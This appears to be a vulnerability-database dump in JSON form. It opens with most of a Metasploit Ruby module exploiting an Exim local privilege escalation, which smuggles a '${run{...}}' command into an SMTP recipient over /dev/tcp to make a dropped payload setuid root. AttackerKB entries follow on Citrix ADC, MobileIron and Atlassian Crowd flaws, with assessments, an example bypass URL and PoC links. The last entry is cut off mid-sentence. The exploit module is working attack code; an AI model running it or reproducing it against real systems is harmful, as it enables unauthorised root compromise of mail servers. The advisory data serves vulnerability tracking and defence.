\nOptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef encode_command(cmd) \n'\\x' + cmd.unpack('H2' * cmd.length).join('\\x') \nend \n \ndef open_tcp_connection \nsocket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) \nparams = Rex::Socket::Parameters.new({ \n'PeerHost' => '127.0.0.1', \n'PeerPort' => datastore['EXIMPORT'] \n}) \nbegin \nsocket = socket_subsystem.create_tcp_client_channel(params) \nrescue => e \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? 
(see EXIMPORT)\") \nraise e \nend \nreturn socket_subsystem, socket \nend \n \ndef inject_payload(payload) \nif session.type == 'meterpreter' \nsocket_subsystem, socket = open_tcp_connection \n \ntcp_conversation = { \nnil => /220/, \n'helo localhost' => /250/, \n\"MAIL FROM:<>\" => /250/, \n\"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/, \n'DATA' => /354/, \n'Received:' => nil, \n'.' => /250/ \n} \n \nbegin \ntcp_conversation.each do |line, pattern| \nTimeout.timeout(datastore['SendExpectTimeout']) do \nif line \nif line == 'Received:' \nfor i in (1..31) \nsocket.puts(\"#{line} #{i}\\n\") \nend \nelse \nsocket.puts(\"#{line}\\n\") \nend \nend \nif pattern \nsocket.expect(pattern) \nend \nend \nend \nrescue Rex::ConnectionError => e \nfail_with(Failure::Unreachable, e.message) \nrescue Timeout::Error \nfail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') \nensure \nsocket.puts(\"QUIT\\n\") \nsocket.close \nsocket_subsystem.shutdown \nend \nelse \nunless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\ \n\"&& echo true\").chomp.to_s == 'true' \nfail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\") \nend \n \nbash_script = %| \n#!/bin/bash \n \nexec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho 'rcpt to:<${run{#{payload}}}@localhost>' >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in $(seq 1 30); do \necho 'Received: $i' >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n| \n \n@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@bash_script_path, bash_script) \nregister_file_for_cleanup(@bash_script_path) \nchmod(@bash_script_path) \ncmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\") \nend \n \nprint_status('Payload sent, 
wait a few seconds...') \nRex.sleep(5) \nend \n \ndef check_for_bash \nunless command_exists?('/bin/bash') \nfail_with(Failure::NotFound, 'bash not found') \nend \nend \n \ndef on_new_session(session) \nsuper \n \nif session.type == 'meterpreter' \nsession.core.use('stdapi') unless session.ext.aliases.include?('stdapi') \nsession.fs.file.rm(@payload_path) \nelse \nsession.shell_command_token(\"rm -f #{@payload_path}\") \nend \nend \n \ndef check \nif session.type == 'meterpreter' \nbegin \nsocket_subsystem, socket = open_tcp_connection \nrescue \nreturn CheckCode::Safe \nend \nres = socket.gets \nsocket.close \nsocket_subsystem.shutdown \nelse \ncheck_for_bash \nres = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\ \n\"(read -u 3 && echo $REPLY) || echo false'\") \nif res == 'false' \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nreturn CheckCode::Safe \nend \nend \n \nif res =~ /Exim ([0-9\\.]+)/i \nversion = Gem::Version.new($1) \nvprint_status(\"Found exim version: #{version}\") \nif version >= target[:lower_version] && version <= target[:upper_version] \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nCheckCode::Unknown \nend \n \ndef exploit \nif is_root? \nunless datastore['ForceExploit'] \nfail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.') \nend \nend \n \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \nif nosuid?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\") \nend \n \nunless datastore['PrependSetuid'] && datastore['PrependSetgid'] \nfail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\ \n'to get root privileges.') \nend \n \nif session.type == 'shell' \ncheck_for_bash \nend \n \n@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@payload_path, payload.encoded_exe) \nregister_file_for_cleanup(@payload_path) \ninject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\ \n\"chmod 4755 #{@payload_path}'\")) \n \nunless setuid?(@payload_path) \nfail_with(Failure::Unknown, \"Couldn't escalate privileges\") \nend \n \ncmd_exec(\"#{@payload_path} & echo \") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154198/exim4_deliver_message_priv_esc.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:23", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 1:02pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. 
As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n**gwillcox-r7** at October 20, 2020 5:54pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "href": "https://attackerkb.com/topics/r0FRieLWQM/cve-2020-8196", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-13T08:05:31", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.\n\n \n**Recent assessments:** \n \n**mekhalleh** at July 12, 2020 6:17pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. 
<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI quickly wrote a metasploit auxiliary scanner and tested it on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\n**gwillcox-r7** at October 20, 2020 5:52pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. <https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI quickly wrote a metasploit auxiliary scanner and tested it on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "href": "https://attackerkb.com/topics/1F4m9YYhx2/cve-2020-8193", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-20T20:13:22", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 12:59pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. 
As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8195", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "href": "https://attackerkb.com/topics/rSz4fDlp1Z/cve-2020-8195", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": 
"2021-07-20T20:11:10", "description": "An authentication bypass vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 that allows remote attackers to bypass authentication mechanisms via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 22, 2020 8:22pm UTC reported:\n \n \n https://mobileiron/mifs/.;/services/someService\n \n\nThe \u201c[auth bypass](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>)\u201d relies on a discrepancy between how Apache and Tomcat parse the path component in the URI, which is the same technique that was applied to [CVE-2020-5902](<https://attackerkb.com/topics/evLpPlZf0i/cve-2020-5902-tmui-rce-vulnerability>).\n\n\u201cBypassing authentication\u201d allows one to achieve RCE against either the user interface or the management interface, though it\u2019s not clear that [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) is the RCE used in the [blog post](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>). This is more of an ACL bypass than an auth bypass, honestly. This was briefly mentioned in the post.\n\nSince MobileIron is [mobile device management (MDM)](<https://en.wikipedia.org/wiki/Mobile_device_management>) software, which is increasingly relevant as the workforce shifts toward remote work, compromising a target\u2019s MDM infrastructure may have devastating consequences.\n\nDevelopers gluing disparate pieces of software together should take care to avoid turning expected input from one software into unexpected input for another. This bug class is [well-documented](<https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf>). 
In the end, even input sanitization should take care to avoid normalization bugs.\n\nGreat find, Orange!\n\nAlso see [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), a MobileIron RCE.\n\n**ETA: [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) uses an _ACL_ bypass, but in retrospect, I don\u2019t think it\u2019s this _auth_ bypass.** This analysis can be applied to [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), consequently.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "attackerkb", "title": "CVE-2020-15506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15505", "CVE-2020-15506", "CVE-2020-5902"], "modified": "2020-09-18T00:00:00", "id": "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "href": "https://attackerkb.com/topics/nPl8YRkKRb/cve-2020-15506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T07:43:34", "description": "Multiple 
vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. These vulnerabilities, if exploited, could result in a number of security issues .\n\n \n**Recent assessments:** \n \n**ccondon-r7** at July 10, 2020 11:15pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**busterb** at July 10, 2020 11:17pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T00:00:00", "type": "attackerkb", "title": "CTX276688: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-09T00:00:00", "id": "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "href": "https://attackerkb.com/comments/7cdfb3cc-0c4d-43e2-b2d5-88dca8befba8", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-12T22:50:36", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. 
All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "attackerkb", "title": "CVE-2019-11580", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-07-24T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:32:31", "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n 
src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. 
Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different 
